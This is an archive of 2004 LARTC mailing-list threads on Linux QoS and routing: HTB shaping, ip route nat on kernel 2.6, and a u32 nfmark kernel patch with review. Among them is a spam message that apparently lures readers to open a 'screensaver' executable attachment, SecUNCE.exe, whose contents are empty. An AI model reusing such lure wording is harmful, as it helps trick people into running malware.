[LARTC] QoS and arp packets.
Hello list, I'm having problems with HTB on a machine. I noticed that after a while the machine seems off-line after i start the htb script. After some debugging i realised the problem stays in the arp packets send by the machine, which are delayed or dropped. Because of that i had to remove the default class. Is there a way to match arp packets ? because i want to add them to the class destinated for the machine itself. Thanks in advance. ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] ip route nat madness.
Hello. I need your help. The problem is I can not make route nat working with kernel 2.6 although in 2.4 everthing works perfectly. If this is the wrong list to ask question about this, please poke me in the right one. So. I have router with two network cards: eth0(192.168.1.10) and eth1 (192.168.2.150). Kernel is 2.6.8.1. In the kernel all options and suboptions concerning IP: advanced router are enabled. I want to map computer in 192.168.2.0/24 subnet with IP 192.168.2.5 on 192.168.1.17 in 192.168.1.0/24 subnet. I am not an artist but may be this graph can illustrate my situation: 192.168.1.0/24. nat 192.168.2.0/24 192.168.1.1-192.168.1.10router192.168.2.150-192.168.2.5 eth0eth1 host i want 192.168.1.17--nat to map dummy address So following ip-cref written by Alexey Kuznetsov first of all I issue the command: nat router # ip route add nat 192.168.1.17 via 192.168.2.5 Now my router answers ARP for 192.168.1.17 and recieves the packets for it. Then it ever route them from eth0 to eth1 BUT it does not nat destination ip address. Look what one can see using tcpdimp! I ping 172.16.1.17 from 192.168.1.1: nat router # tcpdump -ni eth0 05:49:19.085838 arp who-has 192.168.1.17 tell 192.168.1.1 05:49:19.086938 arp reply 192.168.1.17 is-at 00:0c:29:od:85:04 05:49:19.692799 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1 AT the same time on eth1: nat router # tcpdump -ni eth0 05:49:19.692837 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1 My route table is Ok. nat router # ip route 192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.250 192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.10 127.0.0.0/8 via 127.0.0.1 dev lo scope link So why the packet that should be DNATed is not and how could packet that should be sent to eth0 sent to eth1? Is there any other possibility to nat 192.168.2.5 on 192.168.1.17? The last question what is with IP: fast network address translation in 2.6.9 kernel? Why it is absent? Thank you in advance, _ Peter. P.S. I need your help to find sollution. Otherwise there is a possibility for my employer can dismiss me. P.P.S. below is also my letter with the same problem. No one answered it.:( On Tuesday 26 October 2004 20:49, wrote: All worked with 2.4 kernel, but when I have to move to 2.6.8.1 it's not. I'm using ip route nat 231.222.222.111 via 172.16.1.13 to substitute inet address 231.222.222.111 on 172.16.1.13 during routing. Look at the output: _ myhost log # ip route list table local broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 local 172.16.0.1 dev eth1 proto kernel scope host src 172.16.0.1 broadcast 172.16.0.0 dev eth1 proto kernel scope link src 172.16.0.1 broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111 broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111 local 231.222.222.111 dev eth0 proto kernel scope host src 231.222.222.111 broadcast 172.16.255.255 dev eth1 proto kernel scope link src 172.16.0.1 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 nat 231.222.222.111 via 172.16.1.13 scope host local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 myhost log # ip rule 0: from all lookup local 323: from 172.16.1.13 lookup main map-to 231.222.222.111 32766: from all lookup main 32767: from all lookup default ___ So I'm trying to translate local address 172.16.1.13 on 231.222.222.111. And that was working under 2.4 kernel. But now I have to move to 2.6 kernel and now it's not working. I've used this commands: ip route add nat 231.222.222.111 via 172.16.1.13 ip rule add prio 323 from 172.16.1.13 nat 231.222.222.111 !!! To be sure that it is kernel problem I've added this two rules in my FORWARD chain in the very beginning: iptables -I FORWARD -s 172.16.1.13 -j LOG iptables -I FORWARD -d 231.222.222.111 -j LOG Look I have packets that should not be there: Oct 27 00:30:04 rcline IN=eth1 OUT=eth0 SRC=172.16.1.13 DST=64.12.161.185 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=43039 DF PROTO=TCP SPT=1923 DPT=5190 WINDOW=65535 RES=0x00 SYN URGP=0 Oct 27 00:30:04 rcline IN=eth0 OUT=eth1 SRC=83.102.131.142 DST=231.222.222.111 LEN=84 TOS=0x00 PREC=0x00 TTL=59 ID=2990 DF PROTO=ICMP TYPE=8 CODE=0 ID=22310 SEQ=2991 No substitution of niether destination, nor source adresses!!! Please help me to make this working. I've tried 2.6.9 kernel, but It seems there is no IP: fast network address translation. Why. Is feature already deprecated? ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] [PATCH] Use nfmark as a key for u32 classifier
Hello! I am glad to announce a patch for u32 to allow matches on nfmark. The patch is non intrusive (few lines). Why I did this? Because fw classifier cannot be used together with u32. For example, now, you cannot match a mark of 0x90 and a destination port of 80. I know you can do it with iptables to do the marking, but if you use Jamal actions to apply mark to policed packets, you need this. All stuff can be found at http://kernel.umbrella.ro/ also. Dave, please consider adding this patch. Stephen, if Dave accepts the patch, please apply the iproute2 patch. Thank you. Signed-off-by: Catalin(ux aka Dino) BOIE catab at umbrella.ro Thank you for you time. --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/--- iproute2-2.6.9/tc/f_u32.c.orig 2004-11-04 15:38:53.0 +0200 +++ iproute2-2.6.9/tc/f_u32.c 2004-11-05 12:23:44.0 +0200 @@ -7,6 +7,7 @@ * 2 of the License, or (at your option) any later version. * * Authors:Alexey Kuznetsov, [EMAIL PROTECTED] + * Match mark added by Catalin(ux aka Dino) BOIE catab at umbrella.ro [5 nov 2004] * */ @@ -33,7 +34,7 @@ static void explain(void) fprintf(stderr, or u32 divisor DIVISOR\n); fprintf(stderr, \n); fprintf(stderr, Where: SELECTOR := SAMPLE SAMPLE ...\n); - fprintf(stderr,SAMPLE := { ip | ip6 | udp | tcp | icmp | u{32|16|8} } SAMPLE_ARGS\n); + fprintf(stderr,SAMPLE := { ip | ip6 | udp | tcp | icmp | u{32|16|8} | mark } SAMPLE_ARGS\n); fprintf(stderr,FILTERID := X:Y:Z\n); } @@ -590,7 +591,27 @@ done: return res; } +static int parse_mark(int *argc_p, char ***argv_p, struct tc_u32_sel *sel) +{ + int res = -1; + int argc = *argc_p; + char **argv = *argv_p; + + if (argc = 0) + return -1; + if (get_u32(res, *argv, 0)) { + fprintf(stderr, Illegal \mark\\n); + return -1; + } + NEXT_ARG(); + sel-mark = res; + res = 0; + + *argc_p = argc; + *argv_p = argv; + return res; +} static int parse_selector(int *argc_p, char ***argv_p, struct tc_u32_sel *sel) { @@ -641,6 +662,12 @@ static int parse_selector(int *argc_p, c res = parse_icmp(argc, argv, sel); goto done; } + if (matches(*argv, mark) == 0) { + NEXT_ARG(); + res = parse_mark(argc, argv, sel); + goto done; + } + return -1; done: @@ -969,6 +996,8 @@ static int u32_print_opt(struct filter_u struct tc_u32_key *key = sel-keys; if (show_stats NULL != pf) fprintf(f, (rule hit %llu success %llu),pf-rcnt,pf-rhit); + if (sel-mark) + fprintf(f, mark 0x%x, sel-mark); if (sel-nkeys) { for (i=0; isel-nkeys; i++, key++) { fprintf(f, \n match %08x/%08x at %s%d, --- iproute2-2.6.9/include/linux/pkt_cls.h.orig 2004-11-04 15:42:27.0 +0200 +++ iproute2-2.6.9/include/linux/pkt_cls.h 2004-11-05 11:12:22.0 +0200 @@ -208,6 +208,7 @@ struct tc_u32_sel unsigned char flags; unsigned char offshift; unsigned char nkeys; + __u32 mark; __u16 offmask; __u16 off; --- linux.orig/net/sched/cls_u32.c 2004-10-19 00:53:45.0 +0300 +++ linux/net/sched/cls_u32.c 2004-11-05 12:14:31.0 +0200 @@ -27,6 +27,7 @@ * JHS: We should remove the CONFIG_NET_CLS_IND from here * eventually when the meta match extension is made available * + * nfmark match added by Catalin(ux aka Dino) BOIE catab at umbrella.ro */ #include asm/uaccess.h @@ -139,6 +140,11 @@ next_knode: n-pf-rcnt +=1; j = 0; #endif + if ((n-sel.mark 0) (n-sel.mark != skb-nfmark)) { + n = n-next; + goto next_knode; + } + for (i = n-sel.nkeys; i0; i--, key++) { if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-05 11:00:27.0 +0200 @@ -208,6 +208,7 @@ struct tc_u32_sel unsigned char flags; unsigned char offshift; unsigned char nkeys; + u32 mark; __u16 offmask; __u16 off;
[LARTC] ppp nat mappings
Hi all, i hope i'm not totally wrong on this list. I setup a NAT router with the help of adsl-setup and shorewall. I've got a ppp link to the net and shorewall created the iptables. after a reconnect of the ppp link i get a new ip-address, but as long as the existing kernel udp mappings| which were create by outgoing udp traffic| don't get timed out, the router sends out udp packets belonging to this mapping still contain the previous public ip-address. i can see this in /proc/net/ip_conntrack and ethereal: udp 17 178 src=192.168.0.160 dst=217.10.79.9 sport=5060 dport=5060 src=217.10.79.9 dst=80.135.x.y sport=5060 dport=5060 [ASSURED] use=1 but 80.135.x.y was my ipaddress some hours ago. if i stop sending udp packets for about 5 minutes, the mapping is gone and replaced by a mapping containing the correct public ip address. ethereal shows, that the source address of the outgoing udp packets is the old address, so i'm spoofing my ip address. the kernel should notice that the ipaddress belonging to the mapping changed and remove the mapping, shouldn't it? Any suggestions on how to solve this problem? Thanks, joe ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] What determines DROP versus delay (BACKLOG)?
HTB: class htb 1:40 parent 1:1 leaf 40: prio 3 rate 358Kbit ceil 529Kbit \ burst 6Kb cburst 2260b Sent 145871726 bytes 97293 pkts (dropped 69, overlimits 0) rate 56741bit 37pps backlog 23p lended: 77429 borrowed: 19841 giants: 0 I would like to increase backlog because I think that would decrease dropped. 23 packets of 1500 bytes each is only 34,500 bytes. IMO, there could be up to 64K bytes. 1) What determines backlog? 2) How can it be altered? 3) Am I on the right track here? gypsy ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Hi, my darling :)
Look at my new screensaver. I hope you will enjoy... Your Liza MIME-Version: 1.0 Content-Type: multipart/mixed; boundary==_NextPart_000_0009_CFD3D4F6.C8D4B505 X-Priority: 3 X-MSMail-Priority: Normal This is a multi-part message in MIME format. --=_NextPart_000_0009_CFD3D4F6.C8D4B505 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit RE: --=_NextPart_000_0009_CFD3D4F6.C8D4B505 Content-Type: application/x-msdownload; name=SecUNCE.exe Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=SecUNCE.exe --=_NextPart_000_0009_CFD3D4F6.C8D4B505-- ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] Use nfmark as a key for u32 classifier
I think this is an ok midterm solution and should be applied. Thanks. One comment Catalin: Can you resend the patch make this a selectable choice via kconfig? Yes, of course. Also, as a bonus, I will add a mask. Something like this: tc filter add dev eth0 protocol ip parent 1:0 prio 5 u32 \ match mark 0x0090 0x \ ^^ flowid 1:90 It's ok? Eventually - we should kill this + the indev choices on u32 and move it up one so that we can have all filters capable of following filters from other classifiers. As a matter of fact we already have this feature but it is a little on the inefficient side at the moment. It will be very good. It will add the missing flexibility. I'll try to cook up something. cheers, jamal On Fri, 2004-11-05 at 06:38, Catalin(ux aka Dino) BOIE wrote: Hello! I am glad to announce a patch for u32 to allow matches on nfmark. The patch is non intrusive (few lines). Why I did this? Because fw classifier cannot be used together with u32. For example, now, you cannot match a mark of 0x90 and a destination port of 80. I know you can do it with iptables to do the marking, but if you use Jamal actions to apply mark to policed packets, you need this. All stuff can be found at http://kernel.umbrella.ro/ also. Dave, please consider adding this patch. Stephen, if Dave accepts the patch, please apply the iproute2 patch. Thank you. Signed-off-by: Catalin(ux aka Dino) BOIE catab at umbrella.ro Thank you for you time. --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] Use nfmark as a key for u32 classifier
Catalin(ux aka Dino) BOIE wrote: Hello! I am glad to announce a patch for u32 to allow matches on nfmark. The patch is non intrusive (few lines). if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-05 11:00:27.0 +0200 @@ -208,6 +208,7 @@ struct tc_u32_sel unsigned char flags; unsigned char offshift; unsigned char nkeys; + u32 mark; ^^ Please put this at the end to avoid breaking compatibility with old tc binaries. BTW, nfmark if unsigned long, which is 64 bit on 64-bit architectures. Probably not worth fixing though, everyone else got it wrong too. __u16 offmask; __u16 off; Regards Patrick ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] [TRY2] Use nfmark as a key in u32 classifier
On Tue, 9 Nov 2004, jamal wrote: Looks quiet palatable. You didnt CC Dave for inclusion Yes, I tought that he reads evry message on netdev... I added him, thanks. Dave, please, include it in next release. Thank you. cheers, jamal On Tue, 2004-11-09 at 07:27, Catalin(ux aka Dino) BOIE wrote: Hello! This is the try number two. What was changed: - Added selectable choice in Kconfig file (thanks Jamal!) - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!). Stephen, do you have any comments on iproute2 part? I know it's not perfect but this is the best way, I think. u32 match mark it's intuitive but breaks a little the levels, u32 mark it's ok but not intuitive If you want I can rewrite it if you want. Thank you for your time. Signed-off-by: Catalin(ux aka Dino) catab at umbrella.ro --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] [TRY2] Use nfmark as a key in u32 classifier
* Catalin(ux aka Dino) BOIE [EMAIL PROTECTED] 2004-11-09 14:27 This is the try number two. What was changed: - Added selectable choice in Kconfig file (thanks Jamal!) - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!). Your patchs looks fine except for missing dependcy on CONFIG_NETFILTER. Either make CLS_U32_MARK dependant on it or #ifdef the references to skb-nfmark. It might be fair to tell you that this code is likely to be removed again once we have the metadata match. Cheers ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] [TRY2] Use nfmark as a key in u32 classifier
* Catalin(ux aka Dino) BOIE [EMAIL PROTECTED] 2004-11-09 14:27 This is the try number two. What was changed: - Added selectable choice in Kconfig file (thanks Jamal!) - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!). Your patchs looks fine except for missing dependcy on CONFIG_NETFILTER. Either make CLS_U32_MARK dependant on it or #ifdef the references to skb-nfmark. Patch updated and attached. It might be fair to tell you that this code is likely to be removed again once we have the metadata match. Jamal already warned me about this. Is somebody already working on it? Cheers Thank you! --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/--- linux.orig/net/sched/Kconfig2004-10-19 00:55:06.0 +0300 +++ linux/net/sched/Kconfig 2004-11-09 15:39:47.0 +0200 @@ -334,6 +334,18 @@ config NET_CLS_IND Requires a new iproute2 You MUST NOT turn this on if you dont have an update iproute2. +config CLS_U32_MARK + bool Use nfmark as a key in U32 classifier + depends on NET_CLS_U32 NETFILTER + help + This allows you to match mark in a u32 filter. + Example: + tc filter add dev eth0 protocol ip parent 1:0 prio 5 u32 \ + match mark 0x0090 0x \ + match ip dst 4.4.4.4 \ + flowid 1:90 + You must use a new iproute2 to use this feature. + config NET_CLS_RSVP tristate Special RSVP classifier depends on NET_CLS NET_QOS --- linux.orig/net/sched/cls_u32.c 2004-10-19 00:53:45.0 +0300 +++ linux/net/sched/cls_u32.c 2004-11-09 13:56:42.0 +0200 @@ -27,6 +27,7 @@ * JHS: We should remove the CONFIG_NET_CLS_IND from here * eventually when the meta match extension is made available * + * nfmark match added by Catalin(ux aka Dino) BOIE catab at umbrella.ro */ #include asm/uaccess.h @@ -57,6 +58,13 @@ #include net/pkt_sched.h +struct tc_u32_mark +{ + __u32 val; + __u32 mask; + __u32 success; +}; + struct tc_u_knode { struct tc_u_knode *next; @@ -78,6 +86,9 @@ struct tc_u_knode #ifdef CONFIG_CLS_U32_PERF struct tc_u32_pcnt *pf; #endif +#ifdef CONFIG_CLS_U32_MARK + struct tc_u32_mark mark; +#endif struct tc_u32_sel sel; }; @@ -139,6 +150,16 @@ next_knode: n-pf-rcnt +=1; j = 0; #endif + +#ifdef CONFIG_CLS_U32_MARK + if ((skb-nfmark n-mark.mask) != n-mark.val) { + n = n-next; + goto next_knode; + } else { + n-mark.success++; + } +#endif + for (i = n-sel.nkeys; i0; i--, key++) { if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { @@ -615,6 +636,7 @@ static int u32_change(struct tcf_proto * struct tc_u_hnode *ht; struct tc_u_knode *n; struct tc_u32_sel *s; + struct tc_u32_mark *mark; struct rtattr *opt = tca[TCA_OPTIONS-1]; struct rtattr *tb[TCA_U32_MAX]; u32 htid; @@ -718,6 +740,16 @@ static int u32_change(struct tcf_proto * } n-fshift = i; } + +#ifdef CONFIG_CLS_U32_MARK + if (tb[TCA_U32_MARK-1] == 0 || + RTA_PAYLOAD(tb[TCA_U32_MARK-1]) sizeof(struct tc_u32_mark)) + return -EINVAL; + mark = RTA_DATA(tb[TCA_U32_MARK-1]); + memcpy(n-mark, mark, sizeof(struct tc_u32_mark)); + n-mark.success = 0; +#endif + err = u32_set_parms(tp-q, base, ht, n, tb, tca[TCA_RATE-1]); if (err == 0) { struct tc_u_knode **ins; @@ -805,6 +837,12 @@ static int u32_dump(struct tcf_proto *tp RTA_PUT(skb, TCA_U32_CLASSID, 4, n-res.classid); if (n-ht_down) RTA_PUT(skb, TCA_U32_LINK, 4, n-ht_down-handle); + +#ifdef CONFIG_CLS_U32_MARK + if (n-mark.val || n-mark.mask) + RTA_PUT(skb, TCA_U32_MARK, sizeof(n-mark), n-mark); +#endif + #ifdef CONFIG_NET_CLS_ACT /* again for backward compatible mode - we want * to work with both old and new modes of entering --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-09 09:50:45.0 +0200 @@ -190,6 +190,7 @@ enum TCA_U32_ACT, TCA_U32_INDEV, TCA_U32_PCNT, + TCA_U32_MARK, __TCA_U32_MAX };
[LARTC] maybe OT, Linux TCP programming
Is there a way in Linux socket programming, when using TCP sockets to be able to require notifications of when the TCP ACK packets are received. If I send some data over a TCP socket, I'd like to know for sure if the data reached its recipient. A blocking send call, that blocks until all ACK's for the data are received back, would be good enough. -- damjan | This is my jabber ID -- [EMAIL PROTECTED] -- not my mail address!!! ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Reset Statistics?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Is it possible to reset the statistics (ip -s link) ?? If not, why. Maybe there is a trick? Regards ~ Sven - -- ~ Sven Anders [EMAIL PROTECTED] ~ ANDURAS service solutions AG ~ Innstraße 71 - 94036 Passau - Germany ~ Web: www.anduras.de - Tel: +49 (0)851-4 90 50-0 - Fax: +49 (0)851-4 90 50-55 Rechtsform: Aktiengesellschaft - Sitz: Passau - Amtsgericht Passau HRB 6032 Mitglieder des Vorstands: Sven Anders, Marcus Junker, Michael Schön Vorsitzender des Aufsichtsrats: Dipl. Kfm. Karlheinz Antesberger -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.5 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFBkkt/5lKZ7Feg4EcRAkSQAJ9aGpZ1K+w7S0oJvLRnUoCqWRimgwCgmV4g nHK5DbCwfgk+qqn8vA0l8dk= =spAQ -END PGP SIGNATURE- begin:vcard fn:Sven Anders n:Anders;Sven org:ANDURAS AG;Research and Development adr;quoted-printable:;;Innstra=C3=9Fe 71;Passau;Bavaria;94036;Germany email;internet:[EMAIL PROTECTED] title:Dipl. Inf. tel;work:++49 (0)851 / 490 50 - 0 tel;fax:+49 (0)851 / 4 90 50 - 55 x-mozilla-html:FALSE url:http://www.anduras.de version:2.1 end:vcard
[LARTC] icmp
It's possible to shape icmp protocol using htb.init script ? ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] HTB
Hello folks, I´m a fully Beginner in Linux and Traffic Control. I have a lot of Problems to realize the following Scenario(I need it for my scholastics): 2 customers share one 2Mbit link. The packets of the customers are coming on the interface with a NAT Adress each. Each of the customers should use only 1Mbit of the Line. 192.168.0.1- - - customer1eth0 | | eth1customer1 ---| |-- customer22Mbit| | 2Mbit customer2 192.168.1.99 - - - I think I have to use 2 Scripts, one for each interface (on every side). I have written a small skript, but i´m unsteady if it works. It would be very nice, if you can take a look at it and give me some hints. Greetings Marcus Schäfer Traffic Control ### #! /bin/sh #variables ext_dev_1=eth0 bw=1Mbps #root qdisc for eth0 tc qdisc add dev $ext_dev_1 root handle 1: htb #root class for customer 1 on eth0 tc class add dev $ext_dev_1 parent 1: classid 1:1 htb rate $bw ceil $bw prio 0 # 3 classes for customer 1 on eth0 tc class add dev $ext_dev_1 parent 1:1 classid 1:2 htb rate 450kbps ceil $bw prio 0 tc class add dev $ext_dev_1 parent 1:1 classid 1:3 htb rate 450kbps ceil $bw prio 1 tc class add dev $ext_dev_1 parent 1:1 classid 1:4 htb rate 100kbps ceil $bw prio 2 #root class for customer 2 on eth0 tc class add dev $ext_dev_1 parent 1: classid 2:1 htb rate $bw ceil $bw prio 0 #3 classes for customer 2 on eth0 tc class add dev $ext_dev_1 parent 1:1 classid 2:2 htb rate 450kbps ceil $bw prio 0 tc class add dev $ext_dev_1 parent 1:1 classid 2:3 htb rate 450kbps ceil $bw prio 1 tc class add dev $ext_dev_1 parent 1:1 classid 2:4 htb rate 100kbps ceil $bw prio 2 #Filters which directs packets marked with iptables in the right classes #Filters for customer 1 on eth0 tc filter add dev ext_dev_1 parent 1: prio 0 protocol ip handle 1 fw flowid 1:2 tc filter add dev ext_dev_1 parent 1: prio 1 protocol ip handle 2 fw flowid 1:3 tc filter add dev ext_dev_1 parent 1: prio 2 protocol ip handle 3 fw flowid 1:4 #Filters for customer 2 on eth0 tc filter add dev ext_dev_1 parent 1: prio 0 protocol ip handle 4 fw flowid 2:2 tc filter add dev ext_dev_1 parent 1: prio 1 protocol ip handle 5 fw flowid 2:3 tc filter add dev ext_dev_1 parent 1: prio 1 protocol ip handle 6 fw flowid 2:4 iptables ### $ipt=/sbin/iptables ### mark packets for customer 1 on eth0 ### # mark packets with 1 which come from 192.168.0.1 and have a source port #of 80 $ipt -t mangle -A FORWARD -s 192.168.0.1 -p tcp --sport 80 -j MARK --set-mark 1 # mark packets with 2 which come from 192.168.0.1 and have a source port #of 22 $ipt -t mangle -A FORWARD -s 192.168.0.1 -p tcp --sport 22 -j MARK --set-mark 2 mark packets for customer 2 on eth0 ## # mark packets with 4 which come from 192.168.1.99 and have a source port #of 80 $ipt -t mangle -A FORWARD -s 192.168.1.99 -p tcp --sport 80 -j MARK --set-mark 4 # mark packets with 5 which come from 192.168.1.99 and have a source port #of 22 $ipt -t mangle -A FORWARD -s 192.168.1.99 -p tcp --sport 22 -j MARK --set-mark 5 mark unmatched packets ### #mark packets with 3 which come from 192.168.0.1 $ipt -t mangle -A FORWARD -s 192.168.0.1 -j MARK --set-mark 3 #mark packets with 6 which come from 192.168.1.99 $ipt -t mangle -A FORWARD -s 192.168.1.99 -j MARK --set-mark 6 -- NEU +++ DSL Komplett von GMX +++ http://www.gmx.net/de/go/dsl GMX DSL-Netzanschluss + Tarif zum supergünstigen Komplett-Preis! ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] ip route nat. NEED help.
Hello. I need your help. The problem is I can not make route nat working with kernel 2.6 although in 2.4 everthing works perfectly. I forced to have 2.6 kernel as I need SATA. If this is the wrong list to ask question about this, please poke me in the right one. So. I have router with two network cards: eth0(192.168.1.10) and eth1 (192.168.2.150). Kernel is 2.6.8.1. In the kernel all options and suboptions concerning IP: advanced router are enabled. I want to map computer in 192.168.2.0/24 subnet with IP 192.168.2.5 on 192.168.1.17 in 192.168.1.0/24 subnet. I am not an artist but may be this graph can illustrate my situation: 192.168.1.0/24. nat 192.168.2.0/24 192.168.1.1-192.168.1.10router192.168.2.150-192.168.2.5 eth0eth1 host i want 192.168.1.17--nat to map dummy address So following ip-cref written by Alexey Kuznetsov first of all I issue the command: nat router # ip route add nat 192.168.1.17 via 192.168.2.5 Now my router answers ARP for 192.168.1.17 and recieves the packets for it. Then it ever route them from eth0 to eth1 BUT it does not nat destination ip address. Look what one can see using tcpdimp! I ping 172.16.1.17 from 192.168.1.1: nat router # tcpdump -ni eth0 05:49:19.085838 arp who-has 192.168.1.17 tell 192.168.1.1 05:49:19.086938 arp reply 192.168.1.17 is-at 00:0c:29:od:85:04 05:49:19.692799 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1 AT the same time on eth1: nat router # tcpdump -ni eth0 05:49:19.692837 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1 My route table is Ok. nat router # ip route 192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.250 192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.10 127.0.0.0/8 via 127.0.0.1 dev lo scope link So why the packet that should be DNATed is not and how could packet that should be sent to eth0 sent to eth1? Is there any other possibility to nat 192.168.2.5 on 192.168.1.17? The last question what is with IP: fast network address translation in 2.6.9 kernel? Why it is absent? Thank you in advance, _ Peter. P.S. I need your help to find sollution. Otherwise there is a possibility for my employer can dismiss me. P.P.S. below is also my letter with the same problem. No one answered it.:( On Tuesday 26 October 2004 20:49, wrote: All worked with 2.4 kernel, but when I have to move to 2.6.8.1 it's not. I'm using ip route nat 231.222.222.111 via 172.16.1.13 to substitute inet address 231.222.222.111 on 172.16.1.13 during routing. Look at the output: _ myhost log # ip route list table local broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 local 172.16.0.1 dev eth1 proto kernel scope host src 172.16.0.1 broadcast 172.16.0.0 dev eth1 proto kernel scope link src 172.16.0.1 broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111 broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111 local 231.222.222.111 dev eth0 proto kernel scope host src 231.222.222.111 broadcast 172.16.255.255 dev eth1 proto kernel scope link src 172.16.0.1 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 nat 231.222.222.111 via 172.16.1.13 scope host local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 myhost log # ip rule 0: from all lookup local 323: from 172.16.1.13 lookup main map-to 231.222.222.111 32766: from all lookup main 32767: from all lookup default ___ So I'm trying to translate local address 172.16.1.13 on 231.222.222.111. And that was working under 2.4 kernel. But now I have to move to 2.6 kernel and now it's not working. I've used this commands: ip route add nat 231.222.222.111 via 172.16.1.13 ip rule add prio 323 from 172.16.1.13 nat 231.222.222.111 !!! To be sure that it is kernel problem I've added this two rules in my FORWARD chain in the very beginning: iptables -I FORWARD -s 172.16.1.13 -j LOG iptables -I FORWARD -d 231.222.222.111 -j LOG Look I have packets that should not be there: Oct 27 00:30:04 rcline IN=eth1 OUT=eth0 SRC=172.16.1.13 DST=64.12.161.185 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=43039 DF PROTO=TCP SPT=1923 DPT=5190 WINDOW=65535 RES=0x00 SYN URGP=0 Oct 27 00:30:04 rcline IN=eth0 OUT=eth1 SRC=83.102.131.142 DST=231.222.222.111 LEN=84 TOS=0x00 PREC=0x00 TTL=59 ID=2990 DF PROTO=ICMP TYPE=8 CODE=0 ID=22310 SEQ=2991 No substitution of niether destination, nor source adresses!!! Please help me to make this working. I've tried 2.6.9 kernel, but It seems there is no IP: fast network address translation. Why. Is feature already deprecated? ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] maybe OT, Linux TCP programming
